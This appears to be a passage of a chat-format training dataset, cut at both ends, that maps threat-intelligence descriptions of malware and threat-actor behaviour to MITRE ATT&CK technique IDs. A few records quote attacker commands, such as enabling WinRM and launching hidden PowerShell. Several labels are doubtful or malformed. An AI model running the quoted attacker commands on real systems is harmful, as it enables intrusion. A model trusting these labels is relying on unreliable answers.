"Once an attacker has admin access to a Domain Controller, the KRBTGT account password hashes can be extracted using Mimikatz" }, { "role": "assistant", "content": "T1550.003 - Use Alternate Authentication Material: Pass the Ticket" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POLONIUM has obtained and used tools such as AirVPN and plink in their operations." }, { "role": "assistant", "content": "T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "One of the credential theft techniques identified by CrowdStrike was the use of a PowerShell script to execute Mimikatz in-memory. While in-memory Mimikatz is not particularly unique, the script executed by the threat actor was heavily obfuscated and encrypted the output using AES256. CrowdStrike was able to reconstruct the PowerShell script from the PowerShell Operational event log as the script’s execution was logged automatically due to the use of specific keywords. CrowdStrike recommends that organizations upgrade PowerShell on their systems, as this functionality is only available with PowerShell version 5 and above" }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN7 actors have mailed USB drives to potential victims containing malware that downloads and installs various backdoors, including in some cases for ransomware operations." }, { "role": "assistant", "content": "T1091 - Replication Through Removable Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TSCookie has the ability to discover drive information on the infected host." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Despite the notion that modern cybersecurity protocols have stopped email-based attacks, email continues to be one of the primary attack vectors for malicious actors — both for widespread and targeted operations. Recently, Cisco Talos has observed numerous email-based attacks that are spreading malware to users at both a large and small scale. In this blog post, we analyze several of those campaigns and their tactics, techniques and procedures (TTPs). These campaigns were all observed between mid-May and early July of this year, and can likely be attributed to one, or possibly two, groups. The attacks have become more sophisticated, and have evolved to evade detection on a continual basis. Other researchers have attributed these attacks to a group known as the Cobalt Gang, which has continued its activities even after the arrest of its alleged leader in Spain this year. Simple campaigns typically use a single technique and often embed the final executable payload into the exploit document. The emails either contain a URL pointing to one of the three document types or have initial attack stages attached outright" }, { "role": "assistant", "content": "T1059.007 - Command and Scripting Interpreter: JavaScript" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In at least one engagement, we observed Blue Mockingbird seemingly experimenting with different tools to create SOCKS proxies (T1090: Proxy) for pivoting. These tools included a fast reverse proxy (frp), Secure Socket Funneling (SSF), and Venom. In one instance, the adversary also tinkered with PowerShell reverse TCP shells and a reverse shell in DLL form (T1059.001: PowerShell" }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The wiper module (SHA256: 391e7b90bf3f0bfeb2c2602cc65aa6be4dd1c01374b89c4a48425f2d22fe231c) that the dropper writes to the system is responsible for overwriting the data within the MBR, partitions, and files on the system. The wiper carries out this wiping using a legitimate hard disk driver called RawDisk by ElDos. The wiper contains the ElDos RawDisk driver in a resource named 'e' that it extracts by skipping to offset 1984 and reading 27792 bytes from that offset. It then decrypts the data using aa 247-byte key and saves it to ‘%WINDOWS%\\system32\\hdv_725x.sys’. The wiper then creates a service named ‘hdv_725x’ for this driver using the following command line command and runs it with \"sc start hdv_725x" }, { "role": "assistant", "content": "T1485 - Data Destruction" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BlackOasis's first stage shellcode contains a NOP sled with alternative instructions that was likely designed to bypass antivirus tools." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DanBot can use a VBA macro embedded in an Excel file to drop the payload." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GRIFFON has used a reconnaissance module that can be used to retrieve the date and time of the system." }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cyclops Blink can download files via HTTP and HTTPS." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TA459 has targeted victims using spearphishing emails with malicious Microsoft Word attachments." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Remexi executes received commands with wmic.exe (for WMI commands)." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is capable of executing commands and spawning a reverse shell." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Conti can retrieve the ARP cache from the local system by using the \"GetIpNetTable()\" API call and check to ensure IP addresses it connects to are for local, non-Internet, systems." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Capture current screen (screenshot) and save screenshot as a JPEG to \"C:\\ProgramData\\tsc\". The contents of the file are subsequently read and sent to the C2. Code to capture a screenshot as bitmap and save to file" }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In July 2018, Unit 42 analyzed a targeted attack using a novel file type against at least one government agency in the Middle East. It was carried out by a previously unpublished threat group we track as DarkHydrus. Based on our telemetry, we were able to uncover additional artifacts leading us to believe this adversary group has been in operation with their current playbook since early 2016. Once opened, Excel will retrieve whatever object is at the URL inside the file. These files have most recently been found in use by criminals to deliver commodity RATs such as Flawed Ammyy. In DarkHydrus's case, the preferred payload retrieved in their previous attacks were exclusively open-source legitimate tools which they abuse for malicious purposes, such as Meterpreter and Cobalt Strike. However, in this instance, it appears that this group used a custom PowerShell based payload that we call RogueRobin" }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "One of the most noticeable differences is the use of encryption over the entire TCP segment, as a way for it to evade detection. Additionally, this seems to be a lightweight version of Gh0stRAT, as it only has 12 commands, compared to the 73 for a full Gh0stRAT sample; 3 of those commands are undocumented. Also, unlike most samples that I receive on my honeypot, this sample did not start as a DLL that communicates to a distribution server in order to download the stage1" }, { "role": "assistant", "content": "T1573 - Encrypted Channel', 'T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The payload will construct a message that has the following structure that it will then send to the C2:   byed   The message above is sent via a simple HTTPS/HTTP POST request to the C2 server" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "There is a variant of that uses a PowerShell script instead of the traditional PE form." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KOCTOPUS has deployed a modified version of Invoke-Ngrok to expose open local ports to the Internet." }, { "role": "assistant", "content": "T1090 - Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Conti can stop up to 146 Windows services related to security, backup, database, and email solutions through the use of \"net stop\"." }, { "role": "assistant", "content": "T1489 - Service Stop" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Sharpshooter, the threat actors used a VBA macro to execute a simple downloader that installed Rising Sun." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PlugX can be configured to use HTTP for command and control." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can download files off the target system to send back to the server." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The downloaded document template contains the malicious macro codes, which executes a VBScript (VBS)." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter', 'T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Then, it will launch Dec.exe using PowerShell with the command “ cmd.exe /c powershell - WindowStyle Hidden Start-Process Dec.exe - WindowStyle maximized ”." }, { "role": "assistant", "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Raindrop decrypted its Cobalt Strike payload using an AES-256 encryption algorithm in CBC mode with a unique key per sample." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LightNeuron is capable of executing commands via cmd.exe." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "1) The infection chain used in this attack begins with a weaponized link to a Google Drive folder, obfuscated using the goo.gl link shortening service. 2) When contacted, the Google Drive link retrieves a zip file, which contains a .lnk file obfuscated as a .pdf file using the double extension trick. 3) This file requires the target to attempt to open the .lnk file, which redirects the user to a Windows Scripting Component (.wsc) file, hosted on an adversary-controlled microblogging page. MUSTANG PANDA has previously used the observed microblogging site to host malicious PowerShell scripts and Microsoft Office documents in targeted attacks on Mongolia-focused NGOs. 4) The .lnk file uses an embedded VBScript component to retrieve a decoy PDF file and a PowerShell script from the adversary-controlled web page. 6) The Cobalt Strike Beacon implant beacons to the command-and-control (C2) IP address, which is used to remotely control the implant" }, { "role": "assistant", "content": "T1036.007 - Masquerading: Double File Extension" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Turla surveys a system upon check-in to discover operating system configuration details using the \"systeminfo\" and \"set\" commands." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can obtain the victim user name." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery', 'T1069 - Permission Groups Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Elderwood has delivered zero-day exploits and malware to victims by injecting malicious code into specific public Web pages visited by targets within a particular sector." }, { "role": "assistant", "content": "T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Actors used the taskkill command to probably disable security features. CISA was unable to determine which application was associated with the Process ID." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "runs cmd.exe /c and sends the output to its C2." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The database is located in the “/usr/lib/cva-ssys/My_BD” folder (“~/.local/cva-ssys/My_BD”—if the Trojan does not have root privileges)" }, { "role": "assistant", "content": "T1068 - Exploitation for Privilege Escalation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Saint Bot has used `cmd.exe` and `.bat` scripts for execution." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses to execute a payload or commands on a remote host." }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Scarlet Mimic has used the left-to-right override character in self-extracting RAR archive spearphishing attachment file names." }, { "role": "assistant", "content": "T1036.002 - Right-to-Left Override" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Metamorfo has a function that can watch the contents of the system clipboard for valid bitcoin addresses, which it then overwrites with the attacker's address." }, { "role": "assistant", "content": "T1565.002 - Transmitted Data Manipulation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Some samples contain a publicly available Web browser password recovery tool." }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This release adds features to spawn processes with an alternate parent process. This release also gives the operator control over the script templates Cobalt Strike uses in its attacks and workflows. This release of Cobalt Strike pushes back on this technique with the ppid command. For example, if I’m in a user context, I might set explorer.exe as my parent with something plausible (e.g, iexplore.exe) for my temporary processes. If I’m in a SYSTEM context, I might use services.exe as my parent process and ask Beacon to use svchost.exe for its temporary processes. Beacon’s runu command runs an arbitrary command as a child of another parent. These commands offer means to spawn a payload, in another desktop session, without remote process injection. The Resource Kit . Cobalt Strike 3.8’s Resource Kit finally gives you a way to change Cobalt Strike’s built-in script templates. The Resource Kit is a collection of Cobalt Strike’s default script templates and a sample Aggressor Script to bring these into Cobalt Strike. The Resource Kit benefits from new Aggressor Script hooks to provide the PowerShell, Python, and VBA script templates Cobalt Strike uses in its workflows" }, { "role": "assistant", "content": "T1078.003 - Valid Accounts: Local Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Siloscape mimics CExecSvc.exe privileges by impersonating its main thread and then calls NtSetInformationSymbolicLink on a newly created symbolic link to break out of the container. More specifically, it links its local containerized X drive to the host’s C drive" }, { "role": "assistant", "content": "T1611 - Escape to Host" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sidewinder has sent e-mails with malicious links often crafted for specific targets." }, { "role": "assistant", "content": "T1566.002 - Phishing: Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 has developed malware variants written in Python." }, { "role": "assistant", "content": "T1059.006 - Command and Scripting Interpreter: Python" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Peirates can dump the contents of AWS S3 buckets. It can also retrieve service account tokens from kOps buckets in Google Cloud Storage or S3." }, { "role": "assistant", "content": "T1530 - Data from Cloud Storage Object" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The QUADAGENT backdoors dropped onto the hosts were nearly identical to each other, with the only differences being the command and control server (C2) and randomized obfuscation. We were also able to locate a third delivery package of the QUADAGENT backdoor as reported by ClearSky Cyber Security. In their example, the OilRig group used a malicious macro document to deliver the backdoor, which is a tactic much more commonly used by them. A closer examination revealed the obfuscation used by the OilRig group in these QUADAGENT samples were likely the result of using an open-source toolkit called Invoke-Obfuscation. Invoke-Obfuscation has proven to be highly effective at obfuscating PowerShell scripts and in this case, the adversary was able to take advantage of the tool for increased chances of evasion and as an anti-analysis tactic. Based on our telemetry, we have high confidence the email account used to launch this attack was compromised by the OilRig group, likely via credential theft. The file appears to have been compiled using a bat2exe tool, which will take batch files (.bat) and convert them to PE (.exe) files. Its sole purpose here is to install the QUADAGENT backdoor and execute it. The executable will drop the packaged QUADAGENT PowerShell script using the filename Office365DCOMCheck.ps1 in addition to a VBScript file with the same filename which will assist in the execution of it. Once the QUADAGENT payload has executed, it will use rdppath[.]com as the C2, first via HTTPS, then HTTP, then via DNS tunneling, each being used as a corresponding fallback channel if the former fails" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Regin malware platform can use Windows admin shares to move laterally." }, { "role": "assistant", "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HEXANE has used a scheduled task to establish persistence for a keylogger." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BADFLICK has compressed data using the aPLib compression library." }, { "role": "assistant", "content": "T1560.002 - Archive Collected Data: Archive via Library" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chaes has used JavaScript and Node.Js information stealer script that exfiltrates data using the node process." }, { "role": "assistant", "content": "T1059.007 - Command and Scripting Interpreter: JavaScript" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation CuckooBees, the threat actors enabled WinRM over HTTP/HTTPS as a backup persistence mechanism using the following command: `cscript //nologo \"C:\\Windows\\System32\\winrm.vbs\" set winrm/config/service@{EnableCompatibilityHttpsListener=\"true\"}`." }, { "role": "assistant", "content": "T1133 - External Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ROKRAT can check for VMware-related files and DLLs related to sandboxes." }, { "role": "assistant", "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "collects endpoint information using the systeminfo command." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BUBBLEWRAP is a full-featured backdoor that is set to run when the system boots, and can communicate using HTTP, HTTPS, or a SOCKS proxy" }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In the first case, attackers create two WMI event filters and two WMI event consumers. The consumers are simply command lines launching base64-encoded PowerShell commands that load a large PowerShell script stored in the Windows registry. Figure 1 shows how the persistence is established" }, { "role": "assistant", "content": "T1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gelsemium can use junk code to hide functions and evade detection." }, { "role": "assistant", "content": "T1027.001 - Obfuscated Files or Information: Binary Padding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT41 used the storescyncsvc.dll BEACON backdoor to download a secondary backdoor." }, { "role": "assistant", "content": "T1104 - Multi-Stage Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT28 uses a module to receive a notification every time a USB mass storage device is inserted into a victim." }, { "role": "assistant", "content": "T1120 - Peripheral Device Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GravityRAT collects various information via WMI requests, including CPU information in the Win32_Processor entry (Processor ID, Name, Manufacturer and the clock speed)." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sodinokibi gathers some basic system information and saves it to the registry together with the generated encryption parameters. If the dbg option is not set in the config, the UI language and keyboard layout values are checked, and the malware will simply exit on systems which use one of the following language codes" }, { "role": "assistant", "content": "T1112 - Modify Registry', 'T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Spark can collect the hostname, keyboard layout, and language from the system." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "compromised legitimate organizations' websites to create watering holes to compromise victims." }, { "role": "assistant", "content": "T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "More_eggs has used a signed binary shellcode loader and a signed Dynamic Link Library (DLL) to create a reverse shell." }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Okrum can collect network information, including the host IP address, DNS, and proxy information." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sandbox check and anti-virus product enumeration - Dropping payload ‘netmgr.exe’ - Creating a registry key for persistence - Creating a registry key for deletion of the dropper" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Stuxnet used copies of .lnk shortcuts to propagate through removable media." }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32 compromised McAfee ePO to move laterally by distributing malware as a software deployment task." }, { "role": "assistant", "content": "T1072 - Software Deployment Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cyclops Blink has maintained persistence by patching legitimate device firmware when it is downloaded, including that of WatchGuard devices." }, { "role": "assistant", "content": "T1542.002 - Component Firmware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sibot can download and execute a payload onto a compromised system." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GreyEnergy is packed for obfuscation." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Koadic has added persistence to the `HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run` Registry key." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For persistence and remote control, the script downloads another base64-encoded Python script from hxxps://ptpb[.]pw/OAZG. After several steps of de-obfuscation, we found the attackers using EmPyre for post-exploitation control" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SEASHARPEE can execute commands on victims." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - 